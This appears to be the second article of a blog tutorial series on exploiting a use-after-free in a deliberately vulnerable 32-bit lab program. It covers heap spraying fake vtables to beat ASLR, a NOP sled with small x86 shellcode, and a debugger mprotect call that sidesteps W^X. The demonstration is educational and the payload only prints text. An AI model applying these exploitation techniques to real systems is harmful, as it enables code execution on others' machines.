This is part two of a series of articles. Here is part one.
Step 2: Calling a pre-defined routine in the victim with ASLR enabled
In step 1 in the first article of this series we had disabled ASLR in order to have the buffer for the decoded third chunk at a fixed address. Now we will raise the bar for the exploit by enabling ASLR for data, that is for memory on the stack and heap. We will keep ASLR disabled for code (by preventing GCC from creating a position-independent executable (PIE) with the -Wl,-no-pie
compiler flag), so our routine pwned_destructor
still lives at a fixed address.
So how can we defeat ASLR? We somehow need to find out the address of the third chunk’s buffer (because it contains the fake vtable), despite it being a random value now that differs from one invocation of the victim program to the other. We are helped here by the fact that we have a 32-bit program on our hands. As it turns out, with the somewhat limited address space of 32-bit programs (4GB), there are not that many addresses for the kernel to choose from, especially for large memory blocks. The plot below shows the address ranges (start and end addresses of the memory blocks) for different block sizes as obtained by repeated invocations of a program that just calls malloc
.
malloc
by allocation size (with 14 random bits for mmap
)As you can see, if we allocate large enough blocks (100MB in the figure), all address ranges overlap to some extent. This means there is an address range that is guaranteed to be included in each and every memory block we allocate. The actual size threshold above which this is the case depends on a kernel parameter (/proc/sys/vm/mmap_rnd_compat_bits
), which tells the kernel how many random bits it should use for the mmap
system call (mmap
is used internally by malloc
for large allocations). The default seems to be 8 bits (see this article for more details), with this value a memory block of a size of 100MB always gets allocated at the same address. To make things more interesting, I cranked up the value to 14 bits. With that value you get the behavior shown in the figure.
So how does this knowledge help us with the exploit? We would need a large memory allocation (e. g. 100MB) to happen in the program and our fake vtable to be located at an address that is always included in the allocated memory block. This is actually quite easy to accomplish. In the previous step we put just one copy of the vtable in the third chunk. But we can make the third chunk much larger and put lots of copies of the vtable in it. Then we no longer use the start address (which changes) of the buffer for the chunk’s data but an address somewhere in the middle (which stays the same) of this buffer as pointer to the vtable, or to be more precise, to one copy of it. Because the buffer is located on the heap and we sort of "spray" data onto it, this technique is called heap spraying. However, it is, as described here, only possible with 32-bit programs. Due to their much larger address spaces (256 TB), with 64-bit programs it’s in general not possible to allocate memory blocks large enough to get overlapping address ranges. For them, this technique must be combined with a way to find out the program’s address space layout (at least partially), but this is beyond the scope of this series of articles. If I made you curious now, you can read more about this here for example.
How a heap spray looks like in reality is shown in the debugger session below. We take a closer look at the first HTTPChunk
object (which got overwritten) right before it’s about to be deleted.
Breakpoint 1, main () at ./uaf-overwrite-vtable.cpp:179 177 delete p_chunk; pwndbg> x/3dx p_chunk 0x98a3c40: 0xe9000000 0x78787878 0x78787878 (1) pwndbg> x/16dx 0xe9000000 0xe66a9010: 0x0804a3dd 0x0804a3dd 0x0804a3dd 0x0804a3dd (2) 0xe66a9020: 0x0804a3dd 0x0804a3dd 0x0804a3dd 0x0804a3dd 0xe66a9020: 0x0804a3dd 0x0804a3dd 0x0804a3dd 0x0804a3dd 0xe66a9020: 0x0804a3dd 0x0804a3dd 0x0804a3dd 0x0804a3dd pwndbg> i sym 0x0804a3dd (3) pwned_destructor() in section .text of /home/consti/Programmieren/Exploits/uaf-overwrite-vtable
We can see (1) that the object’s pointer to its vtable now points to the address 0xe9000000. If we inspect the memory at this address we see (2) that it indeed contains pointers to the pwned_destructor
routine (3), which make up the vtable. So where does this magic value 0xe9000000 come from? I found it by running the program a few times and choosing a value that was always included in the buffer for the third chunk (somewhere in the middle of it). It only needs to be aligned on a double-word address, then it’s bound to hit a vtable.
Step 3: Injecting the malicious code into the victim
So far, we haven’t injected any code (that we would control) into the program but used a routine already contained in the program. As I have mentioned, this is normally not a realistic scenario. So we will now ditch the routine and see how we can inject our own code.
First off, the injected code must of course be self-contained and position-independent, that is it must be able to run from any location in memory and must not rely on anything other than system calls. This type of code is usually known as shellcode. The shellcode we will use looks like this:
.code32
jmp l_data
l_code:
mov ebx, 2 # file descriptor, 2 = stderr
pop ecx # pointer to buffer
mov edx, 30 # buffer size
mov eax, 4 # system call number, 4 = write
int 0x80 # invoke system call
ret
l_data:
call l_code # call to push the string's address onto the stack
.asciz "\x1b[31mYou've been pwned!!!\x1b[0m\n"
The term shellcode is actually a bit misleading here as we don’t start a shell but just print a string. As you can see, the code is quite simple. First, it performs the JMP-CALL-POP trick to get the address of the string we want to print on the stack, then it invokes the write
system call and returns (because it will be called as a method via the vtable). I translated the code into a raw binary (just the code, no headers and other stuff) using GNU as
and objdump
so that the Python script that performs the exploit can use it.
So how are we going to deliver this code to the victim program? We will use another chunk for that. But we need to find again a way to use a fixed start address (that we will put into the vtable), despite the start address of the chunk’s buffer being random. As you might have guessed, the heap spraying, described in the previous step, comes to the rescue once more. But instead of putting lots of copies of our code into the chunk (as we did with the vtable), we will use a technique known as NOP slide (or NOP sled). You might be familiar with this technique if you know a bit about classical stack overflows. What it means is that we will create a large chunk (again 100MB), fill it almost completely with NOP instructions and put our shellcode at the very end of it. Then we will use an address that is guaranteed to be included in the chunk’s buffer as pointer to our code and put that address in our fake vtable. This address will definitely point to a NOP and when the CPU finally jumps to it, program execution will "slide" down the NOPs until it reaches the shellcode. Note that we don’t care about null bytes in the shellcode as we don’t deliver it as string but as base64-encoded data.
In the following debugger session we will take a closer look at this fourth chunk containing the code.
Breakpoint 1, main () at ./uaf-overwrite-vtable.cpp:179 177 delete p_chunk; pwndbg> x/3dx p_chunk 0x8effc40: 0xe2000000 0x78787878 0x78787878 (1) pwndbg> x/8dx 0xe2000000 0xe2000000: 0xdbc00000 0xdbc00000 0xdbc00000 0xdbc00000 (2) 0xe2000010: 0xdbc00000 0xdbc00000 0xdbc00000 0xdbc00000 pwndbg> x/8bx 0xdbc00000 0xdbc00000: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 pwndbg> x/8i 0xdbc00000 0xdbc00000: nop (3) 0xdbc00001: nop 0xdbc00002: nop 0xdbc00003: nop 0xdbc00004: nop 0xdbc00005: nop 0xdbc00006: nop 0xdbc00007: nop pwndbg> x/12i (0xd9b52010 + 0x6400000 - 60) 0xdff51fd4: nop 0xdff51fd5: nop 0xdff51fd6: nop 0xdff51fd7: jmp 0xdff51fec (4) 0xdff51fd9: mov ebx,0x1 0xdff51fde: pop ecx 0xdff51fdf: mov edx,0x1e 0xdff51fe4: mov eax,0x4 0xdff51fe9: int 0x80 0xdff51feb: ret 0xdff51fec: call 0xdff51fd9 0xdff51ff1: sbb ebx,DWORD PTR [ebx+0x33] pwndbg> x/1s 0xdff51ff1 0xdff51ff1: "\033[31mYou've been pwned!!!\033[0m\n" (5)
But before we do that we note that our overwritten object still contains a pointer to the chunk containing our fake vtables (1), although with a different value than before (0xe2000000 instead of 0xe9000000). And of course the vtable looks different now as well. It contains pointers with the value 0xdbc00000 (2). So what is there at this address? If we display the memory as instruction (3) we see lots of NOPs. So it seems the address is somewhere located in the buffer for the decoded fourth chunk, in the NOP slide. If we examine the end of this buffer (0xd9b52010 is the start address of the buffer, conveniently printed out by the program) we find our shellcode (4) together with the string it prints (5).
I arrived at these two addresses (0xe2000000 and 0xdbc00000) again by running the program a few times and choosing values that were always included in the respective buffers. Interestingly, the buffer for the fourth chunk was always located 100MB below the buffer for the third chunk. The following diagram shows the locations of the chunk’s buffers in memory and their relation (what points to what).
So when the destructor is finally called on the overwritten object, via the pointer in the vtable, the CPU will jump right into the NOP slide, execute all the NOPs until it reaches the shellcode and then the shellcode itself.
Except… it doesn’t, not yet at least. Instead, the program terminates with a segmentation fault. Why is that? Another security measure employed by modern CPUs and operating systems keeps us from succeeding. It is commonly known as data execution prevention (DEP) or W^X and means that any memory regions that are writeable by a program (on the heap or stack) are by default not executable (implemented via the NX bit). As the chunk’s buffer is of course writeable, the CPU will not execute the code in it but generate an exception which leads in turn to the segmentation fault.
So how can we get around this security measure? In the third part of this series I will show you a very clever technique that works by not injecting code into the program but something else. But for now, we will just play a bit unfair and change the permissions of the chunk’s buffer. This can be done very easily in the debugger as you can see below.
pwndbg> vmmap 0xd9b52010 (1) Start End Perm Size Offset File 0xd9b52000 0xf6e00000 rw-p 1d2ae000 0 [anon_d9b52] +0x0 pwndbg> call (long) mprotect(0xd9b52000, 0x1d2ae000, 0x7) (2) $4 = 0
First I use the vmmap
command (provided by the pwndbg extension) to check the permissions of the buffer (1) and you can see that it’s indeed not executable (it misses the "x" bit). Then I call the mprotect
system call (2) to change the permissions (I don’t use the start address and size of the buffer but of the complete memory mapping, 0x7 means "rwx"). After that the exploit actually works.
This is the end of the second article in this series. As I already said we will defeat W^X in the third article. Stay tuned if you liked it so far…